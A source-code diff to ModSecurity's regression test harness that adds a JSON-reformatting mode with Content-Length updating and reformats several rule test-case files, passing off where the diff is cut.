diff --git a/test/common/modsecurity_test.cc b/test/common/modsecurity_test.cc index 21af285d55..23eed49e58 100644 --- a/test/common/modsecurity_test.cc +++ b/test/common/modsecurity_test.cc @@ -68,15 +68,22 @@ bool ModSecurityTest::load_test_json(const std::string &file) { return false; } - size_t num_tests = node->u.array.len; - for ( int i = 0; i < num_tests; i++ ) { - yajl_val obj = node->u.array.values[i]; - - auto u = std::unique_ptr(T::from_yajl_node(obj)); + if (m_format) { + auto u = T::from_yajl_node(node); u->filename = file; - const auto key = u->filename + ":" + u->name; - (*this)[key].push_back(std::move(u)); + (*this)[file].push_back(std::move(u)); + } else { + size_t num_tests = node->u.array.len; + for ( int i = 0; i < num_tests; i++ ) { + yajl_val obj = node->u.array.values[i]; + + auto u = T::from_yajl_node(obj); + u->filename = file; + + const auto key = u->filename + ":" + u->name; + (*this)[key].push_back(std::move(u)); + } } yajl_tree_free(node); @@ -140,6 +147,13 @@ void ModSecurityTest::cmd_options(int argc, char **argv) { i++; m_test_multithreaded = true; } + if (argc > i && strcmp(argv[i], "format") == 0) { + i++; + m_format = true; + } + if (std::getenv("UPDATE_CONTENT_LENGTH")) { + m_update_content_length = true; + } if (std::getenv("AUTOMAKE_TESTS")) { m_automake_output = true; } diff --git a/test/common/modsecurity_test.h b/test/common/modsecurity_test.h index e7a8b1b3e5..6e8a3bbc8f 100644 --- a/test/common/modsecurity_test.h +++ b/test/common/modsecurity_test.h @@ -17,7 +17,7 @@ #include #include #include -#include +#include #ifndef TEST_COMMON_MODSECURITY_TEST_H_ #define TEST_COMMON_MODSECURITY_TEST_H_ @@ -29,13 +29,9 @@ extern std::string default_test_path; namespace modsecurity_test { template class ModSecurityTest : - public std::unordered_map>> { + public std::map>> { public: - ModSecurityTest() - : m_test_number(0), - m_automake_output(false), - m_count_all(false), - m_test_multithreaded(false) { } + ModSecurityTest() = default; std::string header(); void cmd_options(int, char **); @@ -44,12 +40,14 @@ template class ModSecurityTest : bool load_test_json(const std::string &file); std::string target; - bool verbose = false; - bool color = false; - int m_test_number; - bool m_automake_output; - bool m_count_all; - bool m_test_multithreaded; + bool verbose{false}; + bool color{false}; + int m_test_number{0}; + bool m_automake_output{false}; + bool m_count_all{false}; + bool m_test_multithreaded{false}; + bool m_format{false}; + bool m_update_content_length{false}; }; } // namespace modsecurity_test diff --git a/test/common/modsecurity_test_results.h b/test/common/modsecurity_test_results.h index a786fd19f8..15e3b223ed 100644 --- a/test/common/modsecurity_test_results.h +++ b/test/common/modsecurity_test_results.h @@ -14,7 +14,6 @@ */ #include -#include #include #include diff --git a/test/regression/regression.cc b/test/regression/regression.cc index ba37f76dfb..5b1ca514e8 100644 --- a/test/regression/regression.cc +++ b/test/regression/regression.cc @@ -41,6 +41,7 @@ using modsecurity_test::CustomDebugLog; using modsecurity_test::ModSecurityTest; using modsecurity_test::ModSecurityTestResults; using modsecurity_test::RegressionTest; +using modsecurity_test::RegressionTests; using modsecurity_test::RegressionTestResult; using modsecurity::Utils::regex_search; @@ -436,6 +437,35 @@ int main(int argc, char **argv) return 0; #else test.cmd_options(argc, argv); + + if (test.m_format) { +#ifdef WITH_YAJL + std::cout << "start formatting test case JSON files" << std::endl; + ModSecurityTest test2; + test2.cmd_options(argc, argv); + test2.load_tests(); + for (const auto &[name, tests] : test2) { + std::ofstream ofs{name}; + if (!ofs.is_open()) { + std::cerr << "cannot open " << name << " for writing." << std::endl; + return 1; + } + if (test2.m_update_content_length) { + tests[0]->update_content_lengths(); + } + ofs << tests[0]->toJSON(); + ofs.close(); + std::cout << "written formatted JSON to " << name << std::endl; + } + std::cout << "finished formatting files." << std::endl; + return 0; +#else + std::cout << "Test utility cannot format test case JSON files without being built with YAJL." \ + << std::endl; + return 1; +#endif + } + if (!test.m_automake_output && !test.m_count_all) { std::cout << test.header(); } diff --git a/test/regression/regression_test.cc b/test/regression/regression_test.cc index 01ad2aacc9..18f61b64dc 100644 --- a/test/regression/regression_test.cc +++ b/test/regression/regression_test.cc @@ -20,6 +20,12 @@ #include #include #include +#include +#include + +#ifdef WITH_YAJL +#include +#endif namespace modsecurity_test { @@ -48,7 +54,7 @@ inline std::string RegressionTest::yajl_array_to_str(const yajl_val &node) { for (int z = 0; z < node->u.array.len; z++) { yajl_val val3 = node->u.array.values[z]; const char *key = YAJL_GET_STRING(val3); - i << key << "\n"; + i << key; } return i.str(); } @@ -79,137 +85,57 @@ inline std::vector> return vec; } +static inline void set_int_from_yajl(int &dest, std::string_view want_key, std::string_view key, const yajl_val &val) { + if (key == want_key) { + dest = YAJL_GET_INTEGER(val); + } +} + +static inline void set_opt_int_from_yajl(std::optional &dest, std::string_view want_key, std::string_view key, const yajl_val &val) { + if (key == want_key) { + dest = YAJL_GET_INTEGER(val); + } +} + +static inline void set_string_from_yajl(std::string &dest, std::string_view want_key, std::string_view key, const yajl_val &val) { + if (key == want_key) { + dest = YAJL_GET_STRING(val); + } +} -RegressionTest *RegressionTest::from_yajl_node(const yajl_val &node) { +std::unique_ptr RegressionTest::from_yajl_node(const yajl_val &node) { size_t nelem = node->u.object.len; - RegressionTest *u = new RegressionTest(); + auto u = std::make_unique(); u->http_code = 200; for (int i = 0; i < nelem; i++) { const char *key = node->u.object.keys[ i ]; yajl_val val = node->u.object.values[ i ]; - if (strcmp(key, "enabled") == 0) { - u->enabled = YAJL_GET_INTEGER(val); - } - if (strcmp(key, "version_min") == 0) { - u->version_min = YAJL_GET_INTEGER(val); - } - if (strcmp(key, "version_max") == 0) { - u->version_max = YAJL_GET_INTEGER(val); - } - if (strcmp(key, "title") == 0) { - u->title = YAJL_GET_STRING(val); - } - if (strcmp(key, "url") == 0) { - u->url = YAJL_GET_STRING(val); - } - if (strcmp(key, "resource") == 0) { - u->resource = YAJL_GET_STRING(val); - } - if (strcmp(key, "github_issue") == 0) { - u->github_issue = YAJL_GET_INTEGER(val); - } + set_int_from_yajl(u->enabled, "enabled", key, val); + set_int_from_yajl(u->version_min, "version_min", key, val); + set_opt_int_from_yajl(u->version_max, "version_max", key, val); + set_string_from_yajl(u->title, "title", key, val); + set_string_from_yajl(u->url, "url", key, val); + set_string_from_yajl(u->resource, "resource", key, val); + set_opt_int_from_yajl(u->github_issue, "github_issue", key, val); if (strcmp(key, "client") == 0) { - for (int j = 0; j < val->u.object.len; j++) { - const char *key2 = val->u.object.keys[j]; - yajl_val val2 = val->u.object.values[j]; - - if (strcmp(key2, "ip") == 0) { - u->clientIp = YAJL_GET_STRING(val2); - } - if (strcmp(key2, "port") == 0) { - u->clientPort = YAJL_GET_INTEGER(val2); - } - } + u->update_client_from_yajl_node(val); } if (strcmp(key, "server") == 0) { - for (int j = 0; j < val->u.object.len; j++) { - const char *key2 = val->u.object.keys[j]; - yajl_val val2 = val->u.object.values[j]; - - if (strcmp(key2, "ip") == 0) { - u->serverIp = YAJL_GET_STRING(val2); - } - if (strcmp(key2, "port") == 0) { - u->serverPort = YAJL_GET_INTEGER(val2); - } - if (strcmp(key2, "hostname") == 0) { - u->hostname = YAJL_GET_STRING(val2); - } - } + u->update_server_from_yajl_node(val); } if (strcmp(key, "request") == 0) { - for (int j = 0; j < val->u.object.len; j++) { - const char *key2 = val->u.object.keys[j]; - yajl_val val2 = val->u.object.values[j]; - - if (strcmp(key2, "uri") == 0) { - u->uri = YAJL_GET_STRING(val2); - } - if (strcmp(key2, "method") == 0) { - u->method = YAJL_GET_STRING(val2); - } - if (strcmp(key2, "http_version") == 0) { - u->httpVersion = YAJL_GET_NUMBER(val2); - } - if (strcmp(key2, "headers") == 0) { - u->request_headers = yajl_array_to_map(val2); - } - if (strcmp(key2, "body") == 0) { - u->request_body = yajl_array_to_str(val2); - } - } + u->update_request_from_yajl_node(val); } if (strcmp(key, "response") == 0) { - for (int j = 0; j < val->u.object.len; j++) { - const char *key2 = val->u.object.keys[j]; - yajl_val val2 = val->u.object.values[j]; - - if (strcmp(key2, "headers") == 0) { - u->response_headers = yajl_array_to_map(val2); - } - if (strcmp(key2, "body") == 0) { - u->response_body = yajl_array_to_str(val2); - } - if (strcmp(key2, "protocol") == 0) { - u->response_protocol = YAJL_GET_STRING(val2); - } - } + u->update_response_from_yajl_node(val); } if (strcmp(key, "expected") == 0) { - for (int j = 0; j < val->u.object.len; j++) { - const char *key2 = val->u.object.keys[j]; - yajl_val val2 = val->u.object.values[j]; - - if (strcmp(key2, "audit_log") == 0) { - u->audit_log = YAJL_GET_STRING(val2); - } - if (strcmp(key2, "debug_log") == 0) { - u->debug_log = YAJL_GET_STRING(val2); - } - if (strcmp(key2, "error_log") == 0) { - u->error_log = YAJL_GET_STRING(val2); - } - if (strcmp(key2, "http_code") == 0) { - u->http_code = YAJL_GET_INTEGER(val2); - } - if (strcmp(key2, "redirect_url") == 0) { - u->redirect_url = YAJL_GET_STRING(val2); - } - if (strcmp(key2, "parser_error") == 0) { - u->parser_error = YAJL_GET_STRING(val2); - } - } + u->update_expected_from_yajl_node(val); } if (strcmp(key, "rules") == 0) { - std::stringstream si; - for (int j = 0; j < val->u.array.len; j++) { - yajl_val val2 = val->u.array.values[ j ]; - const char *keyj = YAJL_GET_STRING(val2); - si << keyj << "\n"; - } - u->rules = si.str(); + u->update_rules_from_yajl_node(val); } } @@ -218,4 +144,312 @@ RegressionTest *RegressionTest::from_yajl_node(const yajl_val &node) { return u; } +void RegressionTest::update_client_from_yajl_node(const yajl_val &val) { + for (int j = 0; j < val->u.object.len; j++) { + const char *key2 = val->u.object.keys[j]; + yajl_val val2 = val->u.object.values[j]; + + set_string_from_yajl(clientIp, "ip", key2, val2); + set_int_from_yajl(clientPort, "port", key2, val2); + } +} + +void RegressionTest::update_server_from_yajl_node(const yajl_val &val) { + for (int j = 0; j < val->u.object.len; j++) { + const char *key2 = val->u.object.keys[j]; + yajl_val val2 = val->u.object.values[j]; + + set_string_from_yajl(serverIp, "ip", key2, val2); + set_int_from_yajl(serverPort, "port", key2, val2); + set_string_from_yajl(hostname, "hostname", key2, val2); + } +} + +void RegressionTest::update_request_from_yajl_node(const yajl_val &val) { + for (int j = 0; j < val->u.object.len; j++) { + const char *key2 = val->u.object.keys[j]; + yajl_val val2 = val->u.object.values[j]; + + set_string_from_yajl(uri, "uri", key2, val2); + set_string_from_yajl(method, "method", key2, val2); + if (strcmp(key2, "http_version") == 0) { + httpVersion = YAJL_GET_NUMBER(val2); + } + if (strcmp(key2, "headers") == 0) { + request_headers = yajl_array_to_map(val2); + } + if (strcmp(key2, "body") == 0) { + request_body = yajl_array_to_str(val2); + request_body_lines = yajl_array_to_vec_str(val2); + } + } +} + +void RegressionTest::update_response_from_yajl_node(const yajl_val &val) { + for (int j = 0; j < val->u.object.len; j++) { + const char *key2 = val->u.object.keys[j]; + yajl_val val2 = val->u.object.values[j]; + + if (strcmp(key2, "headers") == 0) { + response_headers = yajl_array_to_map(val2); + } + if (strcmp(key2, "body") == 0) { + response_body = yajl_array_to_str(val2); + response_body_lines = yajl_array_to_vec_str(val2); + } + set_string_from_yajl(response_protocol, "protocol", key2, val2); + } +} + +void RegressionTest::update_expected_from_yajl_node(const yajl_val &val) { + for (int j = 0; j < val->u.object.len; j++) { + const char *key2 = val->u.object.keys[j]; + yajl_val val2 = val->u.object.values[j]; + + set_string_from_yajl(audit_log, "audit_log", key2, val2); + set_string_from_yajl(debug_log, "debug_log", key2, val2); + set_string_from_yajl(error_log, "error_log", key2, val2); + set_int_from_yajl(http_code, "http_code", key2, val2); + set_string_from_yajl(redirect_url, "redirect_url", key2, val2); + set_string_from_yajl(parser_error, "parser_error", key2, val2); + } +} + +void RegressionTest::update_rules_from_yajl_node(const yajl_val &val) { + std::stringstream si; + for (int j = 0; j < val->u.array.len; j++) { + yajl_val val2 = val->u.array.values[ j ]; + const char *keyj = YAJL_GET_STRING(val2); + si << keyj << "\n"; + } + rules = si.str(); + rules_lines = yajl_array_to_vec_str(val); +} + + +constexpr char ascii_tolower(char c) { + return 'A' <= c && c <= 'Z' ? (c + ('a' - 'A')) : c; +} + +bool iequals_ascii(std::string_view a, std::string_view b) { + return a.size() == b.size() && + std::equal(a.begin(), a.end(), b.begin(), b.end(), + [](char x, char y) { + return ascii_tolower(x) == ascii_tolower(y); + }); +} + +static bool has_chunked_header(const std::vector> &headers) { + return std::any_of(std::begin(headers), std::end(headers), + [](const auto &header) { + const auto &[name, value]{header}; + return iequals_ascii(name, "Transfer-Encoding") && iequals_ascii(value, "chunked"); + }); +} + +static void update_content_length(std::vector> &headers, size_t length) { + if (has_chunked_header(headers)) { + return; + } + + bool has_content_length = false; + for (auto &[name, value] : headers) { + if (iequals_ascii(name, "Content-Length")) { + value = std::to_string(length); + has_content_length = true; + } + } + if (!has_content_length) { + headers.emplace_back(std::pair{"Content-Length", std::to_string(length)}); + } +} + +void RegressionTest::update_content_lengths() { + update_content_length(request_headers, request_body.size()); + update_content_length(response_headers, response_body.size()); +} + +std::unique_ptr RegressionTests::from_yajl_node(const yajl_val &node) { + auto u = std::make_unique(); + size_t num_tests = node->u.array.len; + for (int i = 0; i < num_tests; i++) { + yajl_val obj = node->u.array.values[i]; + u->tests.emplace_back(std::move(RegressionTest::from_yajl_node(obj))); + } + return u; +} + +void RegressionTests::update_content_lengths() { + for (auto & test : tests) { + test->update_content_lengths(); + } +} + +#ifdef WITH_YAJL + +static yajl_gen_status gen_string_view(yajl_gen g, std::string_view s) { + return yajl_gen_string(g, reinterpret_cast(s.data()), s.length()); +} + +static yajl_gen_status gen_key_str(yajl_gen g, std::string_view key, std::string_view val) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { + return s; + } + return gen_string_view(g, val); +} + +static yajl_gen_status gen_key_str_if_non_empty(yajl_gen g, std::string_view key, std::string_view val) { + if (val.empty()) { + return yajl_gen_status_ok; + } + return gen_key_str(g, key, val); +} + +static yajl_gen_status gen_key_int(yajl_gen g, std::string_view key, int val) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { + return s; + } + return yajl_gen_integer(g, val); +} + +static yajl_gen_status gen_key_opt_int(yajl_gen g, std::string_view key, std::optional val) { + if (!val.has_value()) { + return yajl_gen_status_ok; + } + return gen_key_int(g, key, val.value()); +} + +static yajl_gen_status gen_key_int_if_non_zero(yajl_gen g, std::string_view key, int val) { + if (val == 0) { + return yajl_gen_status_ok; + } + return gen_key_int(g, key, val); +} + +static yajl_gen_status gen_key_number(yajl_gen g, std::string_view key, std::string_view raw_val) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { + return s; + } + return yajl_gen_number(g, reinterpret_cast(raw_val.data()), raw_val.length()); +} + +static yajl_gen_status gen_key_str_array(yajl_gen g, std::string_view key, const std::vector &lines) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { + return s; + } + if (auto s{yajl_gen_array_open(g)}; s != yajl_gen_status_ok) { + return s; + } + for (const auto &line : lines) { + if (auto s{gen_string_view(g, line)}; s != yajl_gen_status_ok) { + return s; + } + } + return yajl_gen_array_close(g); +} + +static yajl_gen_status gen_key_headers(yajl_gen g, std::string_view key, const std::vector> &headers) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { + return s; + } + if (auto s{yajl_gen_map_open(g)}; s != yajl_gen_status_ok) { + return s; + } + for (const auto &[name, value] : headers) { + if (auto s{gen_key_str(g, name, value)}; s != yajl_gen_status_ok) { + return s; + } + } + return yajl_gen_map_close(g); +} + +std::string RegressionTests::toJSON() const { + const unsigned char *buf; + size_t len; + yajl_gen g; + + g = yajl_gen_alloc(NULL); + if (g == NULL) { + return ""; + } + yajl_gen_config(g, yajl_gen_beautify, 1); + yajl_gen_config(g, yajl_gen_indent_string, " "); + + yajl_gen_array_open(g); + for (const auto &t : tests) { + yajl_gen_map_open(g); + gen_key_int(g, "enabled", t->enabled); + gen_key_int(g, "version_min", t->version_min); + gen_key_opt_int(g, "version_max", t->version_max); + gen_key_str(g, "title", t->title); + gen_key_str_if_non_empty(g, "url", t->url); + gen_key_str_if_non_empty(g, "resource", t->resource); + gen_key_opt_int(g, "github_issue", t->github_issue); + + gen_string_view(g, "client"); + yajl_gen_map_open(g); + gen_key_str(g, "ip", t->clientIp); + gen_key_int(g, "port", t->clientPort); + yajl_gen_map_close(g); + + gen_string_view(g, "server"); + yajl_gen_map_open(g); + gen_key_str(g, "ip", t->serverIp); + gen_key_int(g, "port", t->serverPort); + yajl_gen_map_close(g); + + gen_string_view(g, "request"); + yajl_gen_map_open(g); + gen_key_headers(g, "headers", t->request_headers); + gen_key_str(g, "uri", t->uri); + gen_key_str(g, "method", t->method); + if (!t->httpVersion.empty()) { + gen_key_number(g, "http_version", t->httpVersion); + } + + auto request_body_lines{t->request_body_lines}; + if (request_body_lines.empty()) { + request_body_lines.emplace_back(""); + } + gen_key_str_array(g, "body", request_body_lines); + + yajl_gen_map_close(g); + + gen_string_view(g, "response"); + yajl_gen_map_open(g); + gen_key_headers(g, "headers", t->response_headers); + + auto response_body_lines{t->response_body_lines}; + if (response_body_lines.empty()) { + response_body_lines.emplace_back(""); + } + gen_key_str_array(g, "body", response_body_lines); + + gen_key_str_if_non_empty(g, "protocol", t->response_protocol); + yajl_gen_map_close(g); + + gen_string_view(g, "expected"); + yajl_gen_map_open(g); + gen_key_str_if_non_empty(g, "audit_log", t->audit_log); + gen_key_str_if_non_empty(g, "debug_log", t->debug_log); + gen_key_str_if_non_empty(g, "error_log", t->error_log); + gen_key_int(g, "http_code", t->http_code); + gen_key_str_if_non_empty(g, "redirect_url", t->redirect_url); + gen_key_str_if_non_empty(g, "parser_error", t->parser_error); + yajl_gen_map_close(g); + + gen_key_str_array(g, "rules", t->rules_lines); + + yajl_gen_map_close(g); + } + yajl_gen_array_close(g); + + yajl_gen_get_buf(g, &buf, &len); + std::string s{reinterpret_cast(buf), len}; + yajl_gen_free(g); + return s; +} + +#endif // WITH_YAJL + } // namespace modsecurity_test diff --git a/test/regression/regression_test.h b/test/regression/regression_test.h index eb37986723..0271482f96 100644 --- a/test/regression/regression_test.h +++ b/test/regression/regression_test.h @@ -17,11 +17,12 @@ #include #include -#include #include #include #include #include +#include +#include #ifndef TEST_REGRESSION_REGRESSION_TEST_H_ #define TEST_REGRESSION_REGRESSION_TEST_H_ @@ -31,7 +32,7 @@ namespace modsecurity_test { class RegressionTest { public: - static RegressionTest *from_yajl_node(const yajl_val &); + static std::unique_ptr from_yajl_node(const yajl_val &); static std::string print(); std::string filename; @@ -43,8 +44,8 @@ class RegressionTest { std::string url; int enabled; int version_min; - int version_max; - int github_issue; + std::optional version_max; + std::optional github_issue; std::vector> request_headers; std::vector> response_headers; @@ -76,8 +77,34 @@ class RegressionTest { int http_code; std::string redirect_url; + + // fields for formatting JSON + + std::vector request_body_lines; + std::vector response_body_lines; + std::vector rules_lines; + void update_content_lengths(); + +private: + void update_client_from_yajl_node(const yajl_val &val); + void update_server_from_yajl_node(const yajl_val &val); + void update_request_from_yajl_node(const yajl_val &val); + void update_response_from_yajl_node(const yajl_val &val); + void update_expected_from_yajl_node(const yajl_val &val); + void update_rules_from_yajl_node(const yajl_val &val); }; +class RegressionTests { + public: + static std::unique_ptr from_yajl_node(const yajl_val &); + void update_content_lengths(); + std::string toJSON() const; + + std::string filename; + std::string name; + + std::vector> tests; +}; class RegressionTestResult { public: diff --git a/test/test-cases/regression/action-allow.json b/test/test-cases/regression/action-allow.json index 357d451bca..c0ae4603d4 100644 --- a/test/test-cases/regression/action-allow.json +++ b/test/test-cases/regression/action-allow.json @@ -1,98 +1,132 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing allow action (1/3)", - "expected":{ - "debug_log": "Skipped rule id 'action-allow.json:3' as request trough the utilization of an `allow' action", - "http_code": 200 + "enabled": 1, + "version_min": 300000, + "title": "Testing allow action (1/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "rules":[ + "expected": { + "debug_log": "Skipped rule id 'action-allow.json:3' as request trough the utilization of an `allow' action", + "http_code": 200 + }, + "rules": [ "SecRuleEngine On", "SecAction \"phase:1,allow,msg:'ALLOWED',id:500065\"", "SecAction \"phase:1,deny,msg:'DENIED',id:500066\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing allow action (2/3)", - "expected":{ - "debug_log": "", - "http_code": 500 + "enabled": 1, + "version_min": 300000, + "title": "Testing allow action (2/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 500 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"phase:1,allow:request,msg:'ALLOWED',id:500065\"", "SecRule ARGS \"@contains value\" \"id:1,t:trim,status:500,deny,phase:3\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing allow action (3/3)", - "expected":{ - "debug_log": "", - "http_code": 500 + "enabled": 1, + "version_min": 300000, + "title": "Testing allow action (3/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 500 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"phase:1,allow:phase,msg:'ALLOWED',id:500065\"", "SecRule ARGS \"@contains value\" \"id:1,t:trim,status:500,deny,phase:3\"" diff --git a/test/test-cases/regression/action-block.json b/test/test-cases/regression/action-block.json index 239df02715..917d985581 100644 --- a/test/test-cases/regression/action-block.json +++ b/test/test-cases/regression/action-block.json @@ -1,63 +1,88 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing 'block' action without desruptive action", - "expected":{ - "parser_error": "Line: 1. Column: 16. SecDefaultAction must specify a disruptive action." + "enabled": 1, + "version_min": 300000, + "title": "Testing 'block' action without desruptive action", + "client": { + "ip": "200.249.12.31", + "port": 12300 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "client":{ - "ip":"200.249.12.31", - "port":12300 + "request": { + "headers": { + "Host": "a.b.com", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" + }, + "uri": "/path1", + "method": "GET", + "body": [ + "" + ] }, - "request":{ - "headers":{ - "Host":"a.b.com", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/path1", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "http_code": 200, + "parser_error": "Line: 1. Column: 16. SecDefaultAction must specify a disruptive action." }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:1,log,block,status:404\"", "SecRule REQUEST_URI \"@contains path1\" \"phase:1,block,id:5\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing 'block' action with desruptive action", - "expected":{ - "http_code": 400 + "enabled": 1, + "version_min": 300000, + "title": "Testing 'block' action with desruptive action", + "client": { + "ip": "200.249.12.31", + "port": 12300 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "client":{ - "ip":"200.249.12.31", - "port":12300 + "request": { + "headers": { + "Host": "a.b.com", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" + }, + "uri": "/path1", + "method": "GET", + "body": [ + "" + ] }, - "request":{ - "headers":{ - "Host":"a.b.com", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/path1", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:1,log,block,deny,status:400\"", "SecRule REQUEST_URI \"@contains path1\" \"phase:1,block,id:5\"" diff --git a/test/test-cases/regression/action-ctl_audit_engine.json b/test/test-cases/regression/action-ctl_audit_engine.json index 3848ee7e55..c1f5ec86f4 100644 --- a/test/test-cases/regression/action-ctl_audit_engine.json +++ b/test/test-cases/regression/action-ctl_audit_engine.json @@ -15,24 +15,34 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?parm1=test1&parm2=test2", + "uri": "/test.pl?parm1=test1&parm2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "audit_log": "--A--", - "error_log": "", "http_code": 200 }, "rules": [ diff --git a/test/test-cases/regression/action-ctl_request_body_access.json b/test/test-cases/regression/action-ctl_request_body_access.json index a88a8a24b6..e09a732fdf 100644 --- a/test/test-cases/regression/action-ctl_request_body_access.json +++ b/test/test-cases/regression/action-ctl_request_body_access.json @@ -1,28 +1,28 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRequestBodyAccess (1)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyAccess (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "493", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/test", - "method":"POST", - "body":[ + "uri": "/test", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -40,20 +40,22 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + 